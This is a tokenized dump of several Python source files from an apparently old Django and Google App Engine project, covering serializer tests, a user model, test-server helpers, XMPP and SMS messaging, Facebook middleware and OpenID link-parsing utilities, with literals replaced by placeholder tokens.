data_obj , <NUM_LIT> , FloatData , <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , - <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , <NUM_LIT:0.0> ) , <EOL> ( data_obj , <NUM_LIT> , FloatData , None ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , - <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , <NUM_LIT:0> ) , <EOL> ( data_obj , <NUM_LIT> , IntegerData , None ) , <EOL> ( data_obj , <NUM_LIT> , IPAddressData , "<STR_LIT:127.0.0.1>" ) , <EOL> ( data_obj , <NUM_LIT> , IPAddressData , None ) , <EOL> ( data_obj , <NUM_LIT:100> , NullBooleanData , True ) , <EOL> ( data_obj , <NUM_LIT> , NullBooleanData , False ) , <EOL> ( data_obj , <NUM_LIT> , NullBooleanData , None ) , <EOL> ( data_obj , <NUM_LIT> , PhoneData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , PhoneData , None ) , <EOL> ( data_obj , <NUM_LIT> , PositiveIntegerData , <NUM_LIT> ) , <EOL> ( data_obj , <NUM_LIT> , PositiveIntegerData , None ) , <EOL> ( data_obj , <NUM_LIT> , PositiveSmallIntegerData , <NUM_LIT:12> ) , <EOL> ( data_obj , <NUM_LIT> , PositiveSmallIntegerData , None ) , <EOL> ( data_obj , <NUM_LIT> , SlugData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , SlugData , None ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , <NUM_LIT:12> ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , - <NUM_LIT:12> ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , <NUM_LIT:0> ) , <EOL> ( data_obj , <NUM_LIT> , SmallData , None ) , <EOL> ( data_obj , <NUM_LIT> , TextData , """<STR_LIT>""" ) , <EOL> ( data_obj , <NUM_LIT> , TextData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , TextData , None ) , <EOL> ( data_obj , <NUM_LIT> , TimeData , datetime . time ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( data_obj , <NUM_LIT> , TimeData , None ) , <EOL> ( data_obj , <NUM_LIT> , USStateData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , USStateData , None ) , <EOL> ( data_obj , <NUM_LIT> , XMLData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , XMLData , None ) , <EOL> ( generic_obj , <NUM_LIT:200> , GenericData , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( generic_obj , <NUM_LIT> , GenericData , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( fk_obj , <NUM_LIT> , FKData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKData , None ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MData , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( o2o_obj , None , O2OData , <NUM_LIT> ) , <EOL> ( o2o_obj , None , O2OData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKSelfData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKSelfData , <NUM_LIT> ) , <EOL> ( fk_obj , <NUM_LIT> , FKSelfData , None ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( m2m_obj , <NUM_LIT> , M2MSelfData , [ ] ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , Anchor , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , BooleanPKData , True ) , <EOL> ( pk_obj , <NUM_LIT> , BooleanPKData , False ) , <EOL> ( pk_obj , <NUM_LIT> , CharPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , EmailPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , FilePKData , '<STR_LIT>' ) , <EOL> ( pk_obj , <NUM_LIT> , FilePathPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , FloatPKData , <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , FloatPKData , - <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , FloatPKData , <NUM_LIT:0.0> ) , <EOL> ( pk_obj , <NUM_LIT> , IntegerPKData , <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , IntegerPKData , - <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , IntegerPKData , <NUM_LIT:0> ) , <EOL> ( pk_obj , <NUM_LIT> , IPAddressPKData , "<STR_LIT:127.0.0.1>" ) , <EOL> ( pk_obj , <NUM_LIT> , NullBooleanPKData , True ) , <EOL> ( pk_obj , <NUM_LIT> , NullBooleanPKData , False ) , <EOL> ( pk_obj , <NUM_LIT> , PhonePKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , PositiveIntegerPKData , <NUM_LIT> ) , <EOL> ( pk_obj , <NUM_LIT> , PositiveSmallIntegerPKData , <NUM_LIT:12> ) , <EOL> ( pk_obj , <NUM_LIT> , SlugPKData , "<STR_LIT>" ) , <EOL> ( pk_obj , <NUM_LIT> , SmallPKData , <NUM_LIT:12> ) , <EOL> ( pk_obj , <NUM_LIT> , SmallPKData , - <NUM_LIT:12> ) , <EOL> ( pk_obj , <NUM_LIT> , SmallPKData , <NUM_LIT:0> ) , <EOL> ( pk_obj , <NUM_LIT> , USStatePKData , "<STR_LIT>" ) , <EOL> ] <EOL> class SerializerTests ( unittest . TestCase ) : <EOL> pass <EOL> def serializerTest ( format , self ) : <EOL> management . flush ( verbosity = <NUM_LIT:0> , interactive = False ) <EOL> objects = [ ] <EOL> transaction . enter_transaction_management ( ) <EOL> transaction . managed ( True ) <EOL> for ( func , pk , klass , datum ) in test_data : <EOL> objects . append ( func [ <NUM_LIT:0> ] ( pk , klass , datum ) ) <EOL> transaction . commit ( ) <EOL> transaction . leave_transaction_management ( ) <EOL> objects . extend ( Tag . objects . all ( ) ) <EOL> serialized_data = serializers . serialize ( format , objects , indent = <NUM_LIT:2> ) <EOL> management . flush ( verbosity = <NUM_LIT:0> , interactive = False ) <EOL> transaction . enter_transaction_management ( ) <EOL> transaction . managed ( True ) <EOL> for obj in serializers . deserialize ( format , serialized_data ) : <EOL> obj . save ( ) <EOL> transaction . commit ( ) <EOL> transaction . leave_transaction_management ( ) <EOL> for ( func , pk , klass , datum ) in test_data : <EOL> func [ <NUM_LIT:1> ] ( self , pk , klass , datum ) <EOL> for format in serializers . get_serializer_formats ( ) : <EOL> setattr ( SerializerTests , '<STR_LIT>' + format + '<STR_LIT>' , curry ( serializerTest , format ) ) </s>
<s> """<STR_LIT>""" <EOL> from django . core import mail <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . db import models <EOL> from django . utils . encoding import smart_str <EOL> import urllib <EOL> from django . db . models . manager import EmptyManager <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import db <EOL> from appengine_django . models import BaseModel <EOL> class User ( BaseModel ) : <EOL> """<STR_LIT>""" <EOL> user = db . UserProperty ( required = True ) <EOL> username = db . StringProperty ( required = True ) <EOL> first_name = db . StringProperty ( ) <EOL> last_name = db . StringProperty ( ) <EOL> email = db . EmailProperty ( ) <EOL> password = db . StringProperty ( ) <EOL> is_staff = db . BooleanProperty ( default = False , required = True ) <EOL> is_active = db . BooleanProperty ( default = True , required = True ) <EOL> is_superuser = db . BooleanProperty ( default = False , required = True ) <EOL> last_login = db . DateTimeProperty ( auto_now_add = True , required = True ) <EOL> date_joined = db . DateTimeProperty ( auto_now_add = True , required = True ) <EOL> groups = EmptyManager ( ) <EOL> user_permissions = EmptyManager ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . username <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> @ classmethod <EOL> def get_djangouser_for_user ( cls , user ) : <EOL> query = cls . all ( ) . filter ( "<STR_LIT>" , user ) <EOL> if query . count ( ) == <NUM_LIT:0> : <EOL> django_user = cls ( user = user , email = user . email ( ) , username = user . nickname ( ) ) <EOL> django_user . save ( ) <EOL> else : <EOL> django_user = query . get ( ) <EOL> return django_user <EOL> def set_password ( self , raw_password ) : <EOL> raise NotImplementedError <EOL> def check_password ( self , raw_password ) : <EOL> raise NotImplementedError <EOL> def set_unusable_password ( self ) : <EOL> raise NotImplementedError <EOL> def has_usable_password ( self ) : <EOL> raise NotImplementedError <EOL> def get_group_permissions ( self ) : <EOL> return self . user_permissions <EOL> def get_all_permissions ( self ) : <EOL> return self . user_permissions <EOL> def has_perm ( self , perm ) : <EOL> return False <EOL> def has_perms ( self , perm_list ) : <EOL> return False <EOL> def has_module_perms ( self , module ) : <EOL> return False <EOL> def get_and_delete_messages ( self ) : <EOL> """<STR_LIT>""" <EOL> msgs = [ ] <EOL> for msg in self . message_set : <EOL> msgs . append ( msg ) <EOL> msg . delete ( ) <EOL> return msgs <EOL> def is_anonymous ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def is_authenticated ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % urllib . quote ( smart_str ( self . username ) ) <EOL> def get_full_name ( self ) : <EOL> full_name = u'<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> return full_name . strip ( ) <EOL> def email_user ( self , subject , message , from_email ) : <EOL> """<STR_LIT>""" <EOL> mail . send_mail ( subject , <EOL> message , <EOL> from_email , <EOL> [ self . email ] ) <EOL> def get_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> from django . contrib . auth . models import SiteProfileNotAvailable <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> from django . conf import settings <EOL> if not hasattr ( settings , "<STR_LIT>" ) : <EOL> raise SiteProfileNotAvailable <EOL> try : <EOL> app_label , model_name = settings . AUTH_PROFILE_MODULE . split ( '<STR_LIT:.>' ) <EOL> model = models . get_model ( app_label , model_name ) <EOL> self . _profile_cache = model . all ( ) . filter ( "<STR_LIT>" , self ) . get ( ) <EOL> if not self . _profile_cache : <EOL> raise model . DoesNotExist <EOL> except ( ImportError , ImproperlyConfigured ) : <EOL> raise SiteProfileNotAvailable <EOL> return self . _profile_cache <EOL> class Group ( BaseModel ) : <EOL> """<STR_LIT>""" <EOL> name = db . StringProperty ( ) <EOL> permissions = EmptyManager ( ) <EOL> class Message ( BaseModel ) : <EOL> """<STR_LIT>""" <EOL> user = db . ReferenceProperty ( User ) <EOL> message = db . TextProperty ( ) <EOL> class Permission ( BaseModel ) : <EOL> """<STR_LIT>""" <EOL> name = db . StringProperty ( ) </s>
<s> """<STR_LIT>""" <EOL> import httplib <EOL> import logging <EOL> import os <EOL> import unittest <EOL> import sys <EOL> import threading <EOL> from django import http <EOL> from django import test <EOL> from django . test import client <EOL> from django . conf import settings <EOL> from google . appengine . tools import dev_appserver <EOL> from google . appengine . tools import dev_appserver_login <EOL> PORT = <NUM_LIT> <EOL> ROOT_PATH = os . path . dirname ( os . path . dirname ( os . path . dirname ( __file__ ) ) ) <EOL> APP_ID = '<STR_LIT>' <EOL> LOGIN_URL = '<STR_LIT>' <EOL> def start_server ( root_path = ROOT_PATH , port = PORT , app_id = APP_ID ) : <EOL> dev_appserver . ApplicationLoggingHandler . InitializeTemplates ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> dev_appserver . SetupStubs ( app_id , <EOL> login_url = LOGIN_URL , <EOL> datastore_path = '<STR_LIT>' , <EOL> history_path = '<STR_LIT>' , <EOL> clear_datastore = False ) <EOL> server = dev_appserver . CreateServer ( ROOT_PATH , <EOL> LOGIN_URL , <EOL> port , <EOL> '<STR_LIT>' ) <EOL> server_thread = threading . Thread ( target = server . serve_forever ) <EOL> server_thread . setDaemon ( True ) <EOL> server_thread . start ( ) <EOL> return port <EOL> def RetrieveURL ( method , <EOL> host_port , <EOL> relative_url , <EOL> user_info = None , <EOL> body = None , <EOL> extra_headers = [ ] ) : <EOL> """<STR_LIT>""" <EOL> url_host = '<STR_LIT>' % host_port <EOL> logging . info ( '<STR_LIT>' , url_host ) <EOL> try : <EOL> connection = httplib . HTTPConnection ( url_host ) <EOL> logging . info ( '<STR_LIT>' , method , relative_url ) <EOL> try : <EOL> connection . putrequest ( method , relative_url ) <EOL> if user_info is not None : <EOL> email , admin = user_info <EOL> auth_string = '<STR_LIT>' % ( dev_appserver_login . COOKIE_NAME , <EOL> dev_appserver_login . CreateCookieData ( email , admin ) ) <EOL> logging . info ( '<STR_LIT>' , auth_string ) <EOL> connection . putheader ( '<STR_LIT>' , auth_string ) <EOL> if body is not None : <EOL> connection . putheader ( '<STR_LIT>' , len ( body ) ) <EOL> for key , value in extra_headers : <EOL> logging . info ( '<STR_LIT>' , str ( key ) , str ( value ) ) <EOL> connection . putheader ( str ( key ) , str ( value ) ) <EOL> connection . endheaders ( ) <EOL> if body is not None : <EOL> connection . send ( body ) <EOL> response = connection . getresponse ( ) <EOL> status = response . status <EOL> content = response . read ( ) <EOL> headers = dict ( response . getheaders ( ) ) <EOL> logging . info ( '<STR_LIT>' , status , content ) <EOL> return status , content , headers <EOL> finally : <EOL> connection . close ( ) <EOL> except ( IOError , httplib . HTTPException , socket . error ) , e : <EOL> logging . error ( '<STR_LIT>' , e ) <EOL> raise e <EOL> class AppEngineClientHandler ( client . ClientHandler ) : <EOL> def __init__ ( self , port ) : <EOL> super ( AppEngineClientHandler , self ) . __init__ ( ) <EOL> self . _port = port <EOL> self . _host = '<STR_LIT:localhost>' <EOL> def __call__ ( self , environ ) : <EOL> method = environ [ '<STR_LIT>' ] <EOL> host_port = ( self . _host , self . _port ) <EOL> relative_url = environ [ '<STR_LIT>' ] <EOL> if environ [ '<STR_LIT>' ] : <EOL> relative_url += '<STR_LIT>' % environ [ '<STR_LIT>' ] <EOL> body = environ [ '<STR_LIT>' ] . read ( environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> headers = [ ] <EOL> status , content , headers = RetrieveURL ( method , <EOL> host_port , <EOL> relative_url , <EOL> body = body , <EOL> extra_headers = headers ) <EOL> response = http . HttpResponse ( content = content , <EOL> status = status ) <EOL> for header , value in headers . iteritems ( ) : <EOL> response [ header ] = value <EOL> return response <EOL> class AppEngineClient ( client . Client ) : <EOL> def __init__ ( self , port , * args , ** kw ) : <EOL> super ( AppEngineClient , self ) . __init__ ( * args , ** kw ) <EOL> self . handler = AppEngineClientHandler ( port = port ) <EOL> class IntegrationTest ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> port = start_server ( ) <EOL> self . gae_client = AppEngineClient ( port = port ) <EOL> def testBasic ( self ) : <EOL> """<STR_LIT>""" <EOL> rv = self . gae_client . get ( '<STR_LIT:/>' ) <EOL> self . assertEquals ( rv . status_code , <NUM_LIT:200> ) </s>
<s> import logging <EOL> from django . conf import settings as django_settings <EOL> from google . appengine . api import users <EOL> from common import component <EOL> from common import util <EOL> def settings ( request ) : <EOL> d = dict ( [ ( k , util . get_metadata ( k ) ) <EOL> for k in django_settings . get_all_members ( ) ] ) <EOL> return dict ( ** d ) <EOL> def components ( request ) : <EOL> return { '<STR_LIT>' : component } <EOL> def flash ( request ) : <EOL> if '<STR_LIT>' not in request . REQUEST : <EOL> return { } <EOL> flash = request . REQUEST [ '<STR_LIT>' ] <EOL> nonce = util . create_nonce ( None , flash ) <EOL> if nonce != request . REQUEST . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return { } <EOL> return { '<STR_LIT>' : flash } <EOL> def gaia ( request ) : <EOL> try : <EOL> gaia_user = users . GetCurrentUser ( ) <EOL> gaia_login = users . CreateLoginURL ( request . META [ '<STR_LIT>' ] ) <EOL> gaia_logout = users . CreateLogoutURL ( '<STR_LIT>' ) <EOL> except : <EOL> gaia_user = None <EOL> gaia_login = "<STR_LIT>" <EOL> gaia_logout = "<STR_LIT>" <EOL> return locals ( ) </s>
<s> import logging <EOL> import re <EOL> from django . conf import settings <EOL> from cleanliness import encoding <EOL> from common import component <EOL> from common . protocol import base <EOL> class JID ( object ) : <EOL> _re_jid = re . compile ( r'<STR_LIT>' ) <EOL> def __init__ ( self , node , host , resource = None ) : <EOL> self . node = node <EOL> self . host = host <EOL> self . resource = resource <EOL> @ classmethod <EOL> def from_uri ( cls , uri ) : <EOL> node , rest = uri . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) <EOL> try : <EOL> host , rest = rest . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> resource = '<STR_LIT:/>' + rest <EOL> except ValueError : <EOL> host = rest <EOL> resource = '<STR_LIT:/>' <EOL> return cls ( node , host , resource ) <EOL> def base ( self ) : <EOL> return '<STR_LIT>' % ( self . node , self . host ) <EOL> def full ( self ) : <EOL> return '<STR_LIT>' % ( self . node , self . host , self . resource ) <EOL> class XmppMessage ( object ) : <EOL> sender = None <EOL> target = None <EOL> message = None <EOL> def __init__ ( self , sender , target , message ) : <EOL> self . sender = JID . from_uri ( sender ) <EOL> self . target = JID . from_uri ( target ) <EOL> self . message = message <EOL> @ classmethod <EOL> def from_request ( cls , request ) : <EOL> xmpp_service = component . best [ '<STR_LIT>' ] <EOL> return xmpp_service . from_request ( cls , request ) <EOL> class XmppConnection ( base . Connection ) : <EOL> def send_message ( self , to_jid_list , message , html_message = None , <EOL> atom_message = None ) : <EOL> if settings . IM_TEST_ONLY : <EOL> to_jid_list = [ x for x in to_jid_list <EOL> if x . base ( ) in settings . IM_TEST_JIDS ] <EOL> message = encoding . smart_str ( message ) <EOL> if html_message : <EOL> html_message = encoding . smart_str ( html_message ) <EOL> if atom_message : <EOL> atom_message = encoding . smart_str ( atom_message ) <EOL> xmpp_service = component . best [ '<STR_LIT>' ] <EOL> xmpp_service . send_message ( [ j . base ( ) for j in to_jid_list ] , <EOL> message , <EOL> html_message = html_message , <EOL> atom_message = atom_message ) </s>
<s> import logging <EOL> import re <EOL> from django . conf import settings <EOL> from django . core import mail <EOL> from common import api <EOL> from common import clean <EOL> from common import exception <EOL> from common import profile <EOL> from common import sms as sms_service <EOL> from common import util <EOL> from common . protocol import sms <EOL> from common . test import base <EOL> from common . test import util as test_util <EOL> class SmsTest ( base . FixturesTestCase ) : <EOL> sender = '<STR_LIT>' <EOL> target = settings . SMS_TARGET <EOL> def setUp ( self ) : <EOL> super ( SmsTest , self ) . setUp ( ) <EOL> self . service = sms_service . SmsService ( sms . SmsConnection ( ) ) <EOL> self . service . init_handlers ( ) <EOL> def receive ( self , message , sender = None , target = None ) : <EOL> if sender is None : <EOL> sender = self . sender <EOL> if target is None : <EOL> target = self . target <EOL> self . service . handle_message ( sender , target , message ) <EOL> self . exhaust_queue_any ( ) <EOL> outbox = sms . outbox [ : ] <EOL> sms . outbox = [ ] <EOL> return outbox <EOL> def assertOutboxContains ( self , outbox , pattern , sender = None ) : <EOL> if sender is None : <EOL> sender = self . sender <EOL> if type ( pattern ) is type ( '<STR_LIT>' ) : <EOL> pattern = re . compile ( pattern ) <EOL> for mobile , message in outbox : <EOL> if mobile == sender and pattern . search ( message ) : <EOL> return True <EOL> self . fail ( '<STR_LIT>' % ( pattern . pattern , outbox ) ) <EOL> def sign_in ( self , nick , sender = None ) : <EOL> password = self . passwords [ clean . nick ( nick ) ] <EOL> r = self . receive ( '<STR_LIT>' % ( nick , password ) , sender = sender ) <EOL> return r <EOL> def test_sign_in ( self ) : <EOL> nick = '<STR_LIT>' <EOL> password = self . passwords [ clean . nick ( nick ) ] <EOL> r = self . receive ( '<STR_LIT>' % ( nick , password ) ) <EOL> self . assertOutboxContains ( r , '<STR_LIT>' % ( util . get_metadata ( '<STR_LIT>' ) , nick ) ) <EOL> def test_sign_on ( self ) : <EOL> self . sign_in ( '<STR_LIT>' ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> self . assertOutboxContains ( r , sms_service . HELP_SIGNED_OUT ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> self . assertOutboxContains ( r , sms_service . HELP_SIGN_IN ) <EOL> def test_post_and_reply ( self ) : <EOL> unpop = '<STR_LIT>' <EOL> r = self . sign_in ( '<STR_LIT>' , sender = unpop ) <EOL> r = self . receive ( '<STR_LIT>' , sender = unpop ) <EOL> r = self . sign_in ( '<STR_LIT>' ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> r = self . receive ( '<STR_LIT>' ) <EOL> self . assertOutboxContains ( r , '<STR_LIT>' , sender = unpop ) <EOL> r = self . receive ( '<STR_LIT>' , sender = unpop ) <EOL> self . assertOutboxContains ( r , '<STR_LIT>' ) <EOL> def test_whitelist ( self ) : <EOL> o = test_util . override ( SMS_MT_WHITELIST = re . compile ( '<STR_LIT>' ) ) <EOL> def _all_blocked ( ) : <EOL> r = self . sign_in ( '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ServiceError , _all_blocked ) <EOL> r = self . sign_in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_ ( r ) <EOL> o . reset ( ) <EOL> def test_blacklist ( self ) : <EOL> o = test_util . override ( SMS_MT_BLACKLIST = re . compile ( '<STR_LIT>' ) ) <EOL> def _all_blocked ( ) : <EOL> r = self . sign_in ( '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ServiceError , _all_blocked ) <EOL> r = self . sign_in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_ ( r ) <EOL> o . reset ( ) </s>
<s> """<STR_LIT>""" <EOL> from facebook import Facebook <EOL> __docformat__ = "<STR_LIT>" <EOL> try : <EOL> from paste . registry import StackedObjectProxy <EOL> from webob . exc import _HTTPMove <EOL> from paste . util . quoting import strip_html , html_quote , no_quote <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> facebook = StackedObjectProxy ( name = "<STR_LIT>" ) <EOL> class CanvasRedirect ( _HTTPMove ) : <EOL> """<STR_LIT>""" <EOL> title = "<STR_LIT>" <EOL> code = <NUM_LIT:200> <EOL> template = '<STR_LIT>' <EOL> def html ( self , environ ) : <EOL> """<STR_LIT>""" <EOL> body = self . make_body ( environ , self . template , html_quote , no_quote ) <EOL> return body <EOL> class FacebookWSGIMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , config , facebook_class = Facebook ) : <EOL> """<STR_LIT>""" <EOL> self . app = app <EOL> self . config = config <EOL> self . facebook_class = facebook_class <EOL> def __call__ ( self , environ , start_response ) : <EOL> config = self . config <EOL> real_facebook = self . facebook_class ( config [ "<STR_LIT>" ] , <EOL> config [ "<STR_LIT>" ] ) <EOL> registry = environ . get ( '<STR_LIT>' ) <EOL> if registry : <EOL> registry . register ( facebook , real_facebook ) <EOL> environ [ '<STR_LIT>' ] = real_facebook <EOL> return self . app ( environ , start_response ) <EOL> try : <EOL> import pylons <EOL> from pylons . controllers . util import redirect_to as pylons_redirect_to <EOL> from routes import url_to <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> class PylonsFacebook ( Facebook ) : <EOL> """<STR_LIT>""" <EOL> def check_session ( self , request = None ) : <EOL> """<STR_LIT>""" <EOL> if request is None : <EOL> request = pylons . request <EOL> return Facebook . check_session ( self , request ) <EOL> def redirect_to ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if self . in_canvas : <EOL> raise CanvasRedirect ( url ) <EOL> pylons_redirect_to ( url ) <EOL> def apps_url_for ( self , * args , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" + url_to ( * args , ** kargs ) <EOL> def create_pylons_facebook_middleware ( app , config ) : <EOL> """<STR_LIT>""" <EOL> return FacebookWSGIMiddleware ( app , config , <EOL> facebook_class = PylonsFacebook ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> import re <EOL> flags = ( re . DOTALL <EOL> | re . IGNORECASE <EOL> | re . VERBOSE <EOL> | re . UNICODE <EOL> ) <EOL> removed_re = re . compile ( r'''<STR_LIT>''' , flags ) <EOL> tag_expr = r'''<STR_LIT>''' <EOL> def tagMatcher ( tag_name , * close_tags ) : <EOL> if close_tags : <EOL> options = '<STR_LIT:|>' . join ( ( tag_name , ) + close_tags ) <EOL> closers = '<STR_LIT>' % ( options , ) <EOL> else : <EOL> closers = tag_name <EOL> expr = tag_expr % locals ( ) <EOL> return re . compile ( expr , flags ) <EOL> html_find = tagMatcher ( '<STR_LIT:html>' ) <EOL> head_find = tagMatcher ( '<STR_LIT>' , '<STR_LIT:body>' ) <EOL> link_find = re . compile ( r'<STR_LIT>' , flags ) <EOL> attr_find = re . compile ( r'''<STR_LIT>''' , flags ) <EOL> replacements = { <EOL> '<STR_LIT>' : '<STR_LIT:&>' , <EOL> '<STR_LIT>' : '<STR_LIT:<>' , <EOL> '<STR_LIT>' : '<STR_LIT:>>' , <EOL> '<STR_LIT>' : '<STR_LIT:">' , <EOL> } <EOL> ent_replace = re . compile ( r'<STR_LIT>' % '<STR_LIT:|>' . join ( replacements . keys ( ) ) ) <EOL> def replaceEnt ( mo ) : <EOL> "<STR_LIT>" <EOL> return replacements . get ( mo . group ( <NUM_LIT:1> ) , mo . group ( ) ) <EOL> def parseLinkAttrs ( html ) : <EOL> """<STR_LIT>""" <EOL> stripped = removed_re . sub ( '<STR_LIT>' , html ) <EOL> html_mo = html_find . search ( stripped ) <EOL> if html_mo is None or html_mo . start ( '<STR_LIT>' ) == - <NUM_LIT:1> : <EOL> return [ ] <EOL> start , end = html_mo . span ( '<STR_LIT>' ) <EOL> head_mo = head_find . search ( stripped , start , end ) <EOL> if head_mo is None or head_mo . start ( '<STR_LIT>' ) == - <NUM_LIT:1> : <EOL> return [ ] <EOL> start , end = head_mo . span ( '<STR_LIT>' ) <EOL> link_mos = link_find . finditer ( stripped , head_mo . start ( ) , head_mo . end ( ) ) <EOL> matches = [ ] <EOL> for link_mo in link_mos : <EOL> start = link_mo . start ( ) + <NUM_LIT:5> <EOL> link_attrs = { } <EOL> for attr_mo in attr_find . finditer ( stripped , start ) : <EOL> if attr_mo . lastgroup == '<STR_LIT>' : <EOL> break <EOL> attr_name , q_val , unq_val = attr_mo . group ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> attr_val = ent_replace . sub ( replaceEnt , unq_val or q_val ) <EOL> link_attrs [ attr_name ] = attr_val <EOL> matches . append ( link_attrs ) <EOL> return matches <EOL> def relMatches ( rel_attr , target_rel ) : <EOL> """<STR_LIT>""" <EOL> rels = rel_attr . strip ( ) . split ( ) <EOL> for rel in rels : <EOL> rel = rel . lower ( ) <EOL> if rel == target_rel : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def linkHasRel ( link_attrs , target_rel ) : <EOL> """<STR_LIT>""" <EOL> rel_attr = link_attrs . get ( '<STR_LIT>' ) <EOL> return rel_attr and relMatches ( rel_attr , target_rel ) <EOL> def findLinksRel ( link_attrs_list , target_rel ) : <EOL> """<STR_LIT>""" <EOL> matchesTarget = lambda attrs : linkHasRel ( attrs , target_rel ) <EOL> return filter ( matchesTarget , link_attrs_list ) <EOL> def findFirstHref ( link_attrs_list , target_rel ) : <EOL> """<STR_LIT>""" <EOL> matches = findLinksRel ( link_attrs_list , target_rel ) <EOL> if not matches : <EOL> return None <EOL> first = matches [ <NUM_LIT:0> ] <EOL> return first . get ( '<STR_LIT>' ) </s>
<s> from openid . association import Association <EOL> from openid . cryptutil import randomString <EOL> from openid . store . nonce import mkNonce , split <EOL> import unittest <EOL> import string <EOL> import time <EOL> import socket <EOL> import random <EOL> import os <EOL> db_host = '<STR_LIT>' <EOL> allowed_handle = [ ] <EOL> for c in string . printable : <EOL> if c not in string . whitespace : <EOL> allowed_handle . append ( c ) <EOL> allowed_handle = '<STR_LIT>' . join ( allowed_handle ) <EOL> def generateHandle ( n ) : <EOL> return randomString ( n , allowed_handle ) <EOL> generateSecret = randomString <EOL> def getTmpDbName ( ) : <EOL> hostname = socket . gethostname ( ) <EOL> hostname = hostname . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> hostname = hostname . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> return "<STR_LIT>" % ( hostname , os . getpid ( ) , random . randrange ( <NUM_LIT:1> , int ( time . time ( ) ) ) ) 